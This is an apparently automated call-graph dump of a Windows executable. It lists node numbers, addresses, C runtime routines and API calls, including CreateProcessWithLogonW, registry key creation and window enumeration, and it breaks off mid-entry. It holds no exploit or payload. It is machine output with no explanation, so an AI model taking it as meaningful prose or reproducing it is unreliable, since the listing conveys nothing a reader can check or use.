407c87 __calloc_crt 7 API calls 5786->5787 5790 403af8 5786->5790 5795 407428 _strlen 5787->5795 5788 407483 5789 403199 _realloc 2 API calls 5788->5789 5789->5790 5790->5669 5790->5670 5791 407c87 __calloc_crt 7 API calls 5791->5795 5792 4074a8 5793 403199 _realloc 2 API calls 5792->5793 5793->5790 5794 40a659 _strcpy_s 5 API calls 5794->5795 5795->5788 5795->5790 5795->5791 5795->5792 5795->5794 5796 405700 __invoke_watson 5 API calls 5795->5796 5796->5795 5798 406aee __except_handler4 5797->5798 6436 408fa7 5798->6436 5800 406b0d __initterm_e 5802 406b2e __except_handler4 5800->5802 6440 40aca6 5800->6440 5802->5673 5804 407392 5803->5804 5806 407397 5803->5806 5805 40603c ___initmbctable 86 API calls 5804->5805 5805->5806 5807 403b1b 5806->5807 5808 40b39c _parse_cmdline 54 API calls 5806->5808 5809 402990 GetCommandLineW CommandLineToArgvW 5807->5809 5808->5806 6498 402050 5809->6498 5811 4029b1 5811->5679 5812 406c59 5811->5812 6982 406b77 5812->6982 5814 406c66 5814->5679 5816 406b77 _abort 12 API calls 5815->5816 5817 403b4b 5816->5817 5817->5647 5871 40643a 5818->5871 5820 406c9f __init_pointers 5874 40acf1 5820->5874 5823 4063cc ___crtInitCritSecAndSpinCount 9 API calls 5824 406861 5823->5824 5835 4063cc TlsGetValue 5824->5835 5826 403dfc __locking 5825->5826 5827 403e0c VirtualAlloc 5826->5827 5828 403e29 __locking 5827->5828 5828->5705 5830 4064f6 5829->5830 5831 406502 5829->5831 5834 406443 ___crtInitCritSecAndSpinCount 5 API calls 5830->5834 5832 406524 5831->5832 5833 406516 TlsFree 5831->5833 5832->5832 5833->5832 5834->5831 5836 406400 GetModuleHandleA 5835->5836 5837 4063df 5835->5837 5839 406411 5836->5839 5844 4063f8 5836->5844 5837->5836 5838 4063e9 TlsGetValue 5837->5838 5841 4063f4 5838->5841 5877 406360 5839->5877 5841->5836 5841->5844 5842 406416 5843 40641a GetProcAddress 5842->5843 5842->5844 5843->5844 5844->5697 5846 406456 5845->5846 5847 406477 GetModuleHandleA 5845->5847 5846->5847 5848 406460 TlsGetValue 5846->5848 5849 406488 5847->5849 5850 40646f 5847->5850 5852 40646b 5848->5852 5851 406360 ___crtInitCritSecAndSpinCount GetModuleHandleA 5849->5851 5850->5706 5855 407c87 5850->5855 5853 40648d 5851->5853 5852->5847 5852->5850 5853->5850 5854 406491 GetProcAddress 5853->5854 5854->5850 5857 407c8b 5855->5857 5858 4068d6 5857->5858 5859 407cab Sleep 5857->5859 5890 40b3af 5857->5890 5858->5706 5858->5712 5859->5857 5901 404a88 5860->5901 5862 406535 GetModuleHandleA 5863 406586 InterlockedIncrement 5862->5863 5864 406557 5862->5864 5865 4065ad _realloc 5863->5865 5866 406360 ___crtInitCritSecAndSpinCount 5 API calls 5864->5866 5902 40619a InterlockedIncrement 5865->5902 5867 40655c 5866->5867 5867->5863 5868 406560 GetProcAddress GetProcAddress 5867->5868 5868->5863 5870 4065cc _raise _realloc 5870->5716 5872 4063cc ___crtInitCritSecAndSpinCount 9 API calls 5871->5872 5873 406441 5872->5873 5873->5820 5875 4063cc ___crtInitCritSecAndSpinCount 9 API calls 5874->5875 5876 406cd1 5875->5876 5876->5823 5882 406aa9 5877->5882 5880 406382 ___crtInitCritSecAndSpinCount 5880->5842 5881 406386 GetModuleHandleA 5881->5880 5884 406ab4 5882->5884 5883 40637b 5883->5880 5883->5881 5884->5883 5887 4057fc 5884->5887 5888 406443 ___crtInitCritSecAndSpinCount 5 API calls 5887->5888 5889 40580a __invoke_watson 5888->5889 5891 40b3bb _realloc 5890->5891 5892 40b3d3 5891->5892 5897 40b3f2 _memset ___sbh_alloc_block _realloc __calloc_impl 5891->5897 5893 4057fc _wcscat_s 5 API calls 5892->5893 5895 40b3e8 _realloc 5893->5895 5894 40b464 HeapAlloc 5894->5897 5895->5857 5897->5894 5897->5895 5898 406ec8 5897->5898 5899 406443 ___crtInitCritSecAndSpinCount 5 API calls 5898->5899 5900 406ed3 5899->5900 5900->5897 5901->5862 5903 4061b5 InterlockedIncrement 5902->5903 5904 4061b8 5902->5904 5903->5904 5905 4061c2 InterlockedIncrement 5904->5905 5906 4061c5 5904->5906 5905->5906 5907 4061d2 5906->5907 5908 4061cf InterlockedIncrement 5906->5908 5909 4061dc InterlockedIncrement 5907->5909 5910 4061df 5907->5910 5908->5907 5909->5910 5911 4061f4 InterlockedIncrement 5910->5911 5912 406204 InterlockedIncrement 5910->5912 5913 40620d InterlockedIncrement 5910->5913 5911->5910 5912->5910 5913->5870 5960 40b0dd 5914->5960 5916 406e8c 5917 406e99 5916->5917 5919 40b0dd __FF_MSGBANNER 5 API calls 5916->5919 5918 406ce5 __amsg_exit 23 API calls 5917->5918 5922 406ebb 5917->5922 5920 406eb1 5918->5920 5919->5917 5921 406ce5 __amsg_exit 23 API calls 5920->5921 5921->5922 5922->5719 5924 406cf1 5923->5924 5925 40b0dd __FF_MSGBANNER 5 API calls 5924->5925 5956 403972 5924->5956 5926 406d11 5925->5926 5927 406e4c GetStdHandle 5926->5927 5929 40b0dd __FF_MSGBANNER 5 API calls 5926->5929 5928 406e5a _strlen 5927->5928 5927->5956 5932 406e74 WriteFile 5928->5932 5928->5956 5930 406d22 5929->5930 5930->5927 5931 406d34 5930->5931 5931->5956 5965 40a659 5931->5965 5932->5956 5935 406d6a GetModuleFileNameA 5937 406d88 5935->5937 5941 406dab _strlen 5935->5941 5939 40a659 _strcpy_s 5 API calls 5937->5939 5938 406d67 5938->5935 5940 406d98 5939->5940 5940->5941 5942 405700 __invoke_watson 5 API calls 5940->5942 5952 406dee 5941->5952 5975 40a5a6 5941->5975 5942->5941 5947 405700 __invoke_watson 5 API calls 5950 406e12 5947->5950 5948 40a4e5 _strcat_s 5 API calls 5951 406e23 5948->5951 5949 405700 __invoke_watson 5 API calls 5949->5952 5950->5948 5953 406e34 5951->5953 5954 405700 __invoke_watson 5 API calls 5951->5954 5979 40a4e5 5952->5979 5983 40af20 5953->5983 5954->5953 5957 406a13 5956->5957 6027 4069ed GetModuleHandleA 5957->6027 5961 40b0e8 5960->5961 5962 40b0f2 5961->5962 5963 4057fc _wcscat_s 5 API calls 5961->5963 5962->5916 5964 40b11b 5963->5964 5964->5916 5967 40a666 5965->5967 5966 4057fc _wcscat_s 5 API calls 5968 406d56 5966->5968 5967->5966 5967->5968 5968->5935 5969 405700 5968->5969 6020 409280 5969->6020 5971 405791 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 5972 4057d4 GetCurrentProcess TerminateProcess 5971->5972 5973 4057c8 __invoke_watson 5971->5973 5974 4057f4 ___ansicp 5972->5974 5973->5972 5974->5938 5978 40a5b6 5975->5978 5976 406ddb 5976->5949 5976->5952 5977 4057fc _wcscat_s 5 API calls 5977->5976 5978->5976 5978->5977 5982 40a4f2 5979->5982 5980 4057fc _wcscat_s 5 API calls 5981 406e01 5980->5981 5981->5947 5981->5950 5982->5980 5982->5981 5984 40643a __init_pointers 9 API calls 5983->5984 5985 40af2e 5984->5985 5986 40af48 LoadLibraryA 5985->5986 5990 40aff0 5985->5990 5988 40b0c1 5986->5988 5989 40af5d GetProcAddress 5986->5989 5987 40b07b 5994 406443 ___crtInitCritSecAndSpinCount 5 API calls 5987->5994 6015 40b060 5987->6015 5988->5956 5989->5988 5991 40af73 5989->5991 5990->5987 5992 406443 ___crtInitCritSecAndSpinCount 5 API calls 5990->5992 5995 4063cc ___crtInitCritSecAndSpinCount 9 API calls 5991->5995 5996 40b010 5992->5996 5993 406443 ___crtInitCritSecAndSpinCount 5 API calls 5993->5988 6005 40b08b 5994->6005 5997 40af79 GetProcAddress 5995->5997 5998 406443 ___crtInitCritSecAndSpinCount 5 API calls 5996->5998 5999 4063cc ___crtInitCritSecAndSpinCount 9 API calls 5997->5999 6001 40b01d 5998->6001 6000 40af8e GetProcAddress 5999->6000 6002 4063cc ___crtInitCritSecAndSpinCount 9 API calls 6000->6002 6001->5987 6008 40b048 6001->6008 6003 40afa3 6002->6003 6022 406a72 6003->6022 6006 406443 ___crtInitCritSecAndSpinCount 5 API calls 6005->6006 6005->6015 6006->6015 6007 40afb1 6009 405700 __invoke_watson 5 API calls 6007->6009 6013 40afc1 6007->6013 6011 406aa9 ___crtInitCritSecAndSpinCount 5 API calls 6008->6011 6009->6013 6010 40afca GetProcAddress 6014 4063cc ___crtInitCritSecAndSpinCount 9 API calls 6010->6014 6012 40b051 6011->6012 6012->6015 6017 405700 __invoke_watson 5 API calls 6012->6017 6013->5990 6013->6010 6016 40afd8 6014->6016 6015->5993 6016->5990 6018 40afe2 GetProcAddress 6016->6018 6017->6015 6019 4063cc ___crtInitCritSecAndSpinCount 9 API calls 6018->6019 6019->5990 6021 40928c __VEC_memzero 6020->6021 6021->5971 6024 406a7d 6022->6024 6023 406aa3 6023->6007 6024->6023 6025 4057fc _wcscat_s 5 API calls 6024->6025 6026 406a92 6025->6026 6026->6007 6028 4069fc GetProcAddress 6027->6028 6029 406a0c ExitProcess 6027->6029 6028->6029 6030->5727 6032 407b8e _realloc 6031->6032 6033 406443 ___crtInitCritSecAndSpinCount 5 API calls 6032->6033 6034 407b9e 6033->6034 6035 406a72 ___crtInitCritSecAndSpinCount 5 API calls 6034->6035 6037 407bf2 _realloc 6034->6037 6036 407bae 6035->6036 6038 405700 __invoke_watson 5 API calls 6036->6038 6042 407bbd 6036->6042 6037->5735 6038->6042 6039 407bc6 GetModuleHandleA 6040 407be7 6039->6040 6041 407bd5 GetProcAddress 6039->6041 6043 4063cc ___crtInitCritSecAndSpinCount 9 API calls 6040->6043 6041->6040 6042->6039 6042->6040 6043->6037 6045 407c4b 6044->6045 6047 4077ae 6045->6047 6048 407c63 Sleep 6045->6048 6055 40354a 6045->6055 6047->5759 6047->5767 6048->6045 6054 4031a5 _realloc 6049->6054 6050 4031f9 HeapFree 6051 40320b 6050->6051 6053 40321e _realloc 6050->6053 6052 403210 GetLastError 6051->6052 6052->6053 6053->5768 6054->6050 6054->6053 6056 4035f7 6055->6056 6063 403558 _malloc 6055->6063 6057 406ec8 _realloc 5 API calls 6056->6057 6059 4035fd 6057->6059 6058 406e85 __FF_MSGBANNER 23 API calls 6058->6063 6059->6045 6060 406ce5 __amsg_exit 23 API calls 6060->6063 6061 4035bb HeapAlloc 6061->6063 6062 406a13 _malloc 3 API calls 6062->6063 6063->6058 6063->6060 6063->6061 6063->6062 6064 406ec8 _realloc 5 API calls 6063->6064 6065 4035e0 6063->6065 6064->6063 6065->6045 6067 406045 6066->6067 6068 40604c 6066->6068 6076 405ea2 6067->6076 6068->5774 6072 4074db 6070->6072 6074 407548 6072->6074 6430 40b39c 6072->6430 6073 407646 6073->5778 6073->5780 6074->6073 6075 40b39c 54 API calls _parse_cmdline 6074->6075 6075->6074 6077 405eae _realloc 6076->6077 6102 40665f 6077->6102 6081 405ec1 6119 405c4f 6081->6119 6084 407c47 __malloc_crt 28 API calls 6085 405ee2 6084->6085 6092 406001 _realloc __setmbcp 6085->6092 6126 405cc9 6085->6126 6087 405f05 6088 405f12 InterlockedDecrement 6087->6088 6089 40600e 6087->6089 6090 405f22 6088->6090 6091 405f33 InterlockedIncrement 6088->6091 6089->6092 6093 403199 _realloc 2 API calls 6089->6093 6090->6091 6094 403199 _realloc 2 API calls 6090->6094 6091->6092 6097 405f49 _realloc 6091->6097 6092->6068 6093->6092 6095 405f32 6094->6095 6095->6091 6096 405fc9 InterlockedDecrement 6098 405fd9 6096->6098 6099 405fec InterlockedIncrement 6096->6099 6097->6092 6097->6096 6098->6099 6100 403199 _realloc 2 API calls 6098->6100 6099->6092 6101 405feb 6100->6101 6101->6099 6134 4065e8 GetLastError 6102->6134 6104 406665 6105 405eb7 6104->6105 6106 4069c9 __amsg_exit 23 API calls 6104->6106 6107 405bab 6105->6107 6106->6105 6108 405bb7 _realloc 6107->6108 6109 40665f __setmbcp 44 API calls 6108->6109 6111 405bbc _realloc 6109->6111 6110 405bce __setmbcp 6114 4069c9 __amsg_exit 23 API calls 6110->6114 6115 405bdc _realloc 6110->6115 6111->6110 6112 405c03 InterlockedDecrement 6111->6112 6113 405c1d InterlockedIncrement 6111->6113 6112->6113 6116 405c0e 6112->6116 6113->6110 6114->6115 6115->6081 6116->6113 6117 403199 _realloc 2 API calls 6116->6117 6118 405c1c 6117->6118 6118->6113 6153 4032d9 6119->6153 6122 405c8a 6124 405c7c 6122->6124 6125 405c8f GetACP 6122->6125 6123 405c6c GetOEMCP 6123->6124 6124->6084 6124->6092 6125->6124 6127 405c4f getSystemCP 56 API calls 6126->6127 6128 405ce7 6127->6128 6129 405cf2 setSBCS ___ansicp 6128->6129 6130 405d36 IsValidCodePage 6128->6130 6132 405d5b _memset __setmbcp 6128->6132 6129->6087 6130->6129 6131 405d48 GetCPInfo 6130->6131 6131->6129 6131->6132 6336 405a21 GetCPInfo 6132->6336 6148 4064ba TlsGetValue 6134->6148 6136 406653 SetLastError 6136->6104 6138 407c87 __calloc_crt 7 API calls 6139 406611 6138->6139 6139->6136 6140 406443 ___crtInitCritSecAndSpinCount 5 API calls 6139->6140 6141 40662b 6140->6141 6142 406632 6141->6142 6143 40664a 6141->6143 6144 406529 _raise 17 API calls 6142->6144 6145 403199 _realloc 2 API calls 6143->6145 6146 40663a GetCurrentThreadId 6144->6146 6147 406650 6145->6147 6146->6136 6147->6136 6149 4064e8 6148->6149 6150 4064cd 6148->6150 6149->6136 6149->6138 6151 406443 ___crtInitCritSecAndSpinCount 5 API calls 6150->6151 6152 4064d8 TlsSetValue 6151->6152 6152->6149 6154 4032e8 6153->6154 6157 403335 6153->6157 6155 40665f __setmbcp 44 API calls 6154->6155 6158 4032ed 6155->6158 6156 403315 6156->6157 6160 405bab __setmbcp 46 API calls 6156->6160 6157->6122 6157->6123 6158->6156 6161 4062ea 6158->6161 6160->6157 6162 4062f6 _realloc 6161->6162 6163 40665f __setmbcp 44 API calls 6162->6163 6164 4062fb 6163->6164 6165 406329 _realloc 6164->6165 6166 40630d 6164->6166 6172 4062ac 6165->6172 6167 40665f __setmbcp 44 API calls 6166->6167 6169 406312 _LocaleUpdate::_LocaleUpdate 6167->6169 6170 406320 _realloc 6169->6170 6171 4069c9 __amsg_exit 23 API calls 6169->6171 6170->6156 6171->6170 6173 4062b0 6172->6173 6174 4062e2 6172->6174 6173->6174 6175 40619a ___addlocaleref 8 API calls 6173->6175 6174->6169 6176 4062c3 6175->6176 6176->6174 6180 406220 6176->6180 6181 4062a8 6180->6181 6182 406229 InterlockedDecrement 6180->6182 6181->6174 6194 40605a 6181->6194 6183 406242 6182->6183 6184 40623f InterlockedDecrement 6182->6184 6185 40624c InterlockedDecrement 6183->6185 6186 40624f 6183->6186 6184->6183 6185->6186 6187 406259 InterlockedDecrement 6186->6187 6188 40625c 6186->6188 6187->6188 6189 406266 InterlockedDecrement 6188->6189 6191 406269 6188->6191 6189->6191 6190 40627e InterlockedDecrement 6190->6191 6191->6190 6192 40628e InterlockedDecrement 6191->6192 6193 406297 InterlockedDecrement 6191->6193 6192->6191 6193->6181 6195 4060db 6194->6195 6203 40606e 6194->6203 6196 403199 _realloc 2 API calls 6195->6196 6223 406128 6195->6223 6197 4060fc 6196->6197 6200 403199 _realloc 2 API calls 6197->6200 6199 4060a2 6201 4060c3 6199->6201 6213 403199 _realloc 2 API calls 6199->6213 6207 40610f 6200->6207 6209 403199 _realloc 2 API calls 6201->6209 6203->6195 6203->6199 6206 403199 _realloc 2 API calls 6203->6206 6204 40618e 6210 403199 _realloc 2 API calls 6204->6210 6205 403199 _realloc 2 API calls 6208 40614f 6205->6208 6211 406097 6206->6211 6212 403199 _realloc 2 API calls 6207->6212 6208->6204 6219 403199 HeapFree GetLastError _realloc 6208->6219 6214 4060d0 6209->6214 6215 406194 6210->6215 6224 40a45c 6211->6224 6217 40611d 6212->6217 6218 4060b8 6213->6218 6220 403199 _realloc 2 API calls 6214->6220 6215->6174 6221 403199 _realloc 2 API calls 6217->6221 6240 40a41c 6218->6240 6219->6208 6220->6195 6221->6223 6223->6208 6248 40a28c 6223->6248 6225 40a465 6224->6225 6239 40a4e2 6224->6239 6226 40a476 6225->6226 6227 403199 _realloc 2 API calls 6225->6227 6228 40a488 6226->6228 6229 403199 _realloc 2 API calls 6226->6229 6227->6226 6230 403199 _realloc 2 API calls 6228->6230 6234 40a49a 6228->6234 6229->6228 6230->6234 6231 403199 _realloc 2 API calls 6232 40a4ac 6231->6232 6233 40a4be 6232->6233 6235 403199 _realloc 2 API calls 6232->6235 6236 40a4d0 6233->6236 6237 403199 _realloc 2 API calls 6233->6237 6234->6231 6234->6232 6235->6233 6238 403199 _realloc 2 API calls 6236->6238 6236->6239 6237->6236 6238->6239 6239->6199 6242 40a425 6240->6242 6247 40a459 6240->6247 6241 40a435 6244 40a447 6241->6244 6245 403199 _realloc 2 API calls 6241->6245 6242->6241 6243 403199 _realloc 2 API calls 6242->6243 6243->6241 6246 403199 _realloc 2 API calls 6244->6246 6244->6247 6245->6244 6246->6247 6247->6201 6249 40a299 6248->6249 6335 406148 6248->6335 6250 403199 _realloc 2 API calls 6249->6250 6251 40a2a1 6250->6251 6252 403199 _realloc 2 API calls 6251->6252 6253 40a2a9 6252->6253 6254 403199 _realloc 2 API calls 6253->6254 6255 40a2b1 6254->6255 6256 403199 _realloc 2 API calls 6255->6256 6257 40a2b9 6256->6257 6258 403199 _realloc 2 API calls 6257->6258 6259 40a2c1 6258->6259 6260 403199 _realloc 2 API calls 6259->6260 6261 40a2c9 6260->6261 6262 403199 _realloc 2 API calls 6261->6262 6263 40a2d0 6262->6263 6264 403199 _realloc 2 API calls 6263->6264 6265 40a2d8 6264->6265 6266 403199 _realloc 2 API calls 6265->6266 6267 40a2e0 6266->6267 6268 403199 _realloc 2 API calls 6267->6268 6269 40a2e8 6268->6269 6270 403199 _realloc 2 API calls 6269->6270 6271 40a2f0 6270->6271 6272 403199 _realloc 2 API calls 6271->6272 6273 40a2f8 6272->6273 6274 403199 _realloc 2 API calls 6273->6274 6275 40a300 6274->6275 6276 403199 _realloc 2 API calls 6275->6276 6277 40a308 6276->6277 6278 403199 _realloc 2 API calls 6277->6278 6279 40a310 6278->6279 6280 403199 _realloc 2 API calls 6279->6280 6281 40a318 6280->6281 6282 403199 _realloc 2 API calls 6281->6282 6283 40a323 6282->6283 6284 403199 _realloc 2 API calls 6283->6284 6285 40a32b 6284->6285 6286 403199 _realloc 2 API calls 6285->6286 6287 40a333 6286->6287 6288 403199 _realloc 2 API calls 6287->6288 6289 40a33b 6288->6289 6290 403199 _realloc 2 API calls 6289->6290 6291 40a343 6290->6291 6292 403199 _realloc 2 API calls 6291->6292 6293 40a34b 6292->6293 6294 403199 _realloc 2 API calls 6293->6294 6295 40a353 6294->6295 6296 403199 _realloc 2 API calls 6295->6296 6297 40a35b 6296->6297 6298 403199 _realloc 2 API calls 6297->6298 6299 40a363 6298->6299 6300 403199 _realloc 2 API calls 6299->6300 6301 40a36b 6300->6301 6302 403199 _realloc 2 API calls 6301->6302 6303 40a373 6302->6303 6304 403199 _realloc 2 API calls 6303->6304 6305 40a37b 6304->6305 6306 403199 _realloc 2 API calls 6305->6306 6307 40a383 6306->6307 6308 403199 _realloc 2 API calls 6307->6308 6309 40a38b 6308->6309 6310 403199 _realloc 2 API calls 6309->6310 6311 40a393 6310->6311 6312 403199 _realloc 2 API calls 6311->6312 6313 40a39b 6312->6313 6314 403199 _realloc 2 API calls 6313->6314 6315 40a3a9 6314->6315 6316 403199 _realloc 2 API calls 6315->6316 6317 40a3b4 6316->6317 6318 403199 _realloc 2 API calls 6317->6318 6319 40a3bf 6318->6319 6320 403199 _realloc 2 API calls 6319->6320 6321 40a3ca 6320->6321 6322 403199 _realloc 2 API calls 6321->6322 6323 40a3d5 6322->6323 6324 403199 _realloc 2 API calls 6323->6324 6325 40a3e0 6324->6325 6326 403199 _realloc 2 API calls 6325->6326 6327 40a3eb 6326->6327 6328 403199 _realloc 2 API calls 6327->6328 6329 40a3f6 6328->6329 6330 403199 _realloc 2 API calls 6329->6330 6331 40a401 6330->6331 6332 403199 _realloc 2 API calls 6331->6332 6333 40a40c 6332->6333 6334 403199 _realloc 2 API calls 6333->6334 6334->6335 6335->6205 6338 405a58 _memset 6336->6338 6343 405b01 ___ansicp 6336->6343 6344 40a24c 6338->6344 6342 40a051 ___crtLCMapStringA 76 API calls 6342->6343 6343->6132 6345 4032d9 _LocaleUpdate::_LocaleUpdate 54 API calls 6344->6345 6346 40a25d 6345->6346 6354 40a094 6346->6354 6348 405abc 6349 40a051 6348->6349 6350 4032d9 _LocaleUpdate::_LocaleUpdate 54 API calls 6349->6350 6351 40a062 6350->6351 6389 409caf 6351->6389 6353 405adc 6353->6342 6355 40a0b3 GetStringTypeW 6354->6355 6356 40a0de 6354->6356 6358 40a0d3 GetLastError 6355->6358 6359 40a0cb 6355->6359 6357 40a1c5 6356->6357 6356->6359 6378 40b123 GetLocaleInfoA 6357->6378 6358->6356 6360 40a117 MultiByteToWideChar 6359->6360 6362 40a1bf ___ansicp 6359->6362 6360->6362 6363 40a144 6360->6363 6362->6348 6365 40354a _malloc 27 API calls 6363->6365 6368 40a159 _memset __crtLCMapStringA_stat 6363->6368 6364 40a216 GetStringTypeA 6364->6362 6367 40a231 6364->6367 6365->6368 6366 40a192 MultiByteToWideChar 6369 40a1a8 GetStringTypeW 6366->6369 6370 40a1b9 6366->6370 6371 403199 _realloc 2 API calls 6367->6371 6368->6362 6368->6366 6369->6370 6374 403751 6370->6374 6371->6362 6372 40a1e9 6372->6362 6372->6364 6375 403759 6374->6375 6377 40376a 6374->6377 6376 403199 _realloc 2 API calls 6375->6376 6375->6377 6376->6377 6377->6362 6379 40b154 6378->6379 6381 40b14f ___ansicp 6378->6381 6382 40c214 6379->6382 6381->6372 6385 40cb20 6382->6385 6386 40cb37 6385->6386 6387 40c8f5 strtoxl 65 API calls 6386->6387 6388 40c221 6387->6388 6388->6381 6390 409cce LCMapStringW 6389->6390 6393 409ce9 6389->6393 6391 409cf1 GetLastError 6390->6391 6390->6393 6391->6393 6392 409ee6 6395 40b123 ___ansicp 65 API calls 6392->6395 6393->6392 6394 409d43 6393->6394 6396 409d5c MultiByteToWideChar 6394->6396 6415 409edd ___ansicp 6394->6415 6397 409f0e 6395->6397 6400 409d89 6396->6400 6396->6415 6398 40a002 LCMapStringA 6397->6398 6399 409f27 6397->6399 6397->6415 6410 409f5e 6398->6410 6407 409f43 LCMapStringA 6399->6407 6399->6415 6403 409da2 __crtLCMapStringA_stat 6400->6403 6404 40354a _malloc 27 API calls 6400->6404 6401 409dda MultiByteToWideChar 6402 409df3 LCMapStringW 6401->6402 6427 409ed4 6401->6427 6405 409e14 6402->6405 6402->6427 6403->6401 6403->6415 6404->6403 6411 409e1c 6405->6411 6412 409e45 6405->6412 6406 403199 _realloc 2 API calls 6409 40a029 6406->6409 6407->6410 6417 409f65 6407->6417 6408 403751 __freea 2 API calls 6408->6415 6413 403199 _realloc 2 API calls 6409->6413 6409->6415 6410->6406 6410->6409 6414 409e2e LCMapStringW 6411->6414 6411->6427 6422 409e60 __crtLCMapStringA_stat 6412->6422 6423 40354a _malloc 27 API calls 6412->6423 6413->6415 6414->6427 6415->6353 6416 409e94 LCMapStringW 6419 409eac WideCharToMultiByte 6416->6419 6420 409ece 6416->6420 6418 409f76 _memset __crtLCMapStringA_stat 6417->6418 6421 40354a _malloc 27 API calls 6417->6421 6418->6410 6425 409fb4 LCMapStringA 6418->6425 6419->6420 6424 403751 __freea 2 API calls 6420->6424 6421->6418 6422->6416 6422->6427 6423->6422 6424->6427 6428 409fd0 6425->6428 6427->6408 6429 403751 __freea 2 API calls 6428->6429 6429->6410 6433 40b34b 6430->6433 6434 4032d9 _LocaleUpdate::_LocaleUpdate 54 API calls 6433->6434 6435 40b35c 6434->6435 6435->6072 6437 408fab 6436->6437 6438 4063cc ___crtInitCritSecAndSpinCount 9 API calls 6437->6438 6439 408fc3 6437->6439 6438->6437 6439->5800 6443 40ac6a 6440->6443 6442 40acaf 6442->5802 6444 40ac76 __cinit _realloc 6443->6444 6447 40ab82 6444->6447 6446 40ac87 __cinit _realloc 6446->6442 6448 406443 ___crtInitCritSecAndSpinCount 5 API calls 6447->6448 6449 40ab92 6448->6449 6450 406443 ___crtInitCritSecAndSpinCount 5 API calls 6449->6450 6451 40aba3 6450->6451 6452 40ac26 6451->6452 6464 40c487 6451->6464 6452->6446 6454 40ac0c 6455 4063cc ___crtInitCritSecAndSpinCount 9 API calls 6454->6455 6456 40ac1b 6455->6456 6459 4063cc ___crtInitCritSecAndSpinCount 9 API calls 6456->6459 6457 40abe3 6457->6452 6461 407ccf __realloc_crt 35 API calls 6457->6461 6462 40abfa 6457->6462 6458 40abc1 6458->6454 6458->6457 6471 407ccf 6458->6471 6459->6452 6461->6462 6462->6452 6463 4063cc ___crtInitCritSecAndSpinCount 9 API calls 6462->6463 6463->6454 6465 40c493 _realloc 6464->6465 6466 40c4a3 6465->6466 6469 40c4c0 _realloc __msize 6465->6469 6468 4057fc _wcscat_s 5 API calls 6466->6468 6467 40c501 HeapSize 6470 40c4b8 _realloc 6467->6470 6468->6470 6469->6467 6469->6470 6470->6458 6474 407cd3 6471->6474 6473 407d15 6473->6457 6474->6473 6475 407cf6 Sleep 6474->6475 6476 40b4cd 6474->6476 6475->6474 6477 40b4d9 _realloc 6476->6477 6478 40b4e0 6477->6478 6479 40b4ee 6477->6479 6480 40354a _malloc 27 API calls 6478->6480 6481 40b501 6479->6481 6482 40b4f5 6479->6482 6487 40b4e8 _realloc 6480->6487 6488 40b673 6481->6488 6496 40b50e ___sbh_alloc_block _realloc 6481->6496 6483 403199 _realloc 2 API calls 6482->6483 6483->6487 6484 40b6a6 6485 406ec8 _realloc 5 API calls 6484->6485 6485->6487 6486 40b678 HeapReAlloc 6486->6487 6486->6488 6487->6474 6488->6484 6488->6486 6489 406ec8 _realloc 5 API calls 6488->6489 6491 40b63c 6488->6491 6497 40b659 6488->6497 6489->6488 6490 40b6d3 GetLastError 6490->6487 6491->6487 6494 40b646 GetLastError 6491->6494 6492 40b599 HeapAlloc 6492->6496 6493 40b5ee HeapReAlloc 6493->6496 6494->6487 6495 406ec8 _realloc 5 API calls 6495->6496 6496->6484 6496->6487 6496->6491 6496->6492 6496->6493 6496->6495 6496->6497 6497->6487 6497->6490 6499 402096 _memset 6498->6499 6569 401800 6499->6569 6502 402881 6 API calls 6504 402927 IsDialogMessageW 6502->6504 6568 4022c4 6502->6568 6506 402937 TranslateMessage DispatchMessageW 6504->6506 6507 40294d GetMessageW 6504->6507 6506->6507 6507->6504 6507->6568 6508 402966 LocalFree 6510 402986 ___ansicp 6508->6510 6509 40216d 6511 40346a __wcsicmp 79 API calls 6509->6511 6510->5811 6512 40217a 6511->6512 6513 402185 6512->6513 6514 40227f 6512->6514 6516 40237d 6513->6516 6518 40346a __wcsicmp 79 API calls 6513->6518 6515 40346a __wcsicmp 79 API calls 6514->6515 6517 40228c 6515->6517 6519 4036e5 _wcscpy_s 5 API calls 6516->6519 6520 4022d0 6517->6520 6521 402293 6517->6521 6522 4021a4 6518->6522 6523 4023b6 6519->6523 6528 40346a __wcsicmp 79 API calls 6520->6528 6524 4022aa 6521->6524 6530 40346a __wcsicmp 79 API calls 6521->6530 6525 4021ab SetEnvironmentVariableW 6522->6525 6526 4021be 6522->6526 6606 4029c0 6523->6606 6589 401ba0 6524->6589 6525->6526 6526->6516 6531 4021c6 _memset 6526->6531 6529 4022dd 6528->6529 6533 402321 6529->6533 6534 4022e4 6529->6534 6530->6524 6581 4036e5 6531->6581 6532 4023c8 6536 4023d3 6532->6536 6537 4023e6 6532->6537 6541 40346a __wcsicmp 79 API calls 6533->6541 6539 4022fb 6534->6539 6542 40346a __wcsicmp 79 API calls 6534->6542 6621 401880 6536->6621 6629 402f60 6537->6629 6545 401ba0 114 API calls 6539->6545 6543 40232e 6541->6543 6542->6539 6546 402370 6543->6546 6547 402335 6543->6547 6545->6568 6550 40346a __wcsicmp 79 API calls 6546->6550 6551 40234c 6547->6551 6553 40346a __wcsicmp 79 API calls 6547->6553 6550->6516 6603 401930 12 API calls 6551->6603 6553->6551 6554 402270 GetLastError 6554->6508 6557 402405 _memset 6557->6508 6558 402494 CreateProcessWithLogonW 6557->6558 6561 402533 EnumWindows 6557->6561 6565 40281e 6557->6565 6653 402cb0 6557->6653 6673 403926 6557->6673 6558->6557 6559 4024f8 GetLastError 6558->6559 6559->6557 6561->6557 6562 402835 6561->6562 6977 402000 GetWindowThreadProcessId 6561->6977 6563 402868 CloseHandle CloseHandle 6562->6563 6564 402850 Sleep EnumWindows 6562->6564 6563->6508 6564->6562 6564->6563 6981 402000 2 API calls 6564->6981 6565->6563 6566 402822 6565->6566 6567 401880 88 API calls 6566->6567 6567->6568 6568->6508 6573 401807 6569->6573 6574 401841 6569->6574 6571 40186b 6571->6502 6575 40346a 6571->6575 6572 40346a 79 API calls __wcsicmp 6572->6573 6573->6572 6573->6574 6676 401470 6574->6676 6576 4034e7 6575->6576 6578 403476 6575->6578 6876 40335b 6576->6876 6579 4057fc _wcscat_s 5 API calls 6578->6579 6580 402162 6578->6580 6579->6580 6580->6502 6580->6509 6583 4036f2 6581->6583 6582 4057fc _wcscat_s 5 API calls 6584 40221c 6582->6584 6583->6582 6583->6584 6585 40366b 6584->6585 6586 403678 6585->6586 6587 4057fc _wcscat_s 5 API calls 6586->6587 6588 402239 CreateProcessW 6586->6588 6587->6588 6588->6508 6588->6554 6887 4019f0 RegCreateKeyExW 6589->6887 6591 401bb3 6592 401c0a 6591->6592 6593 4019f0 97 API 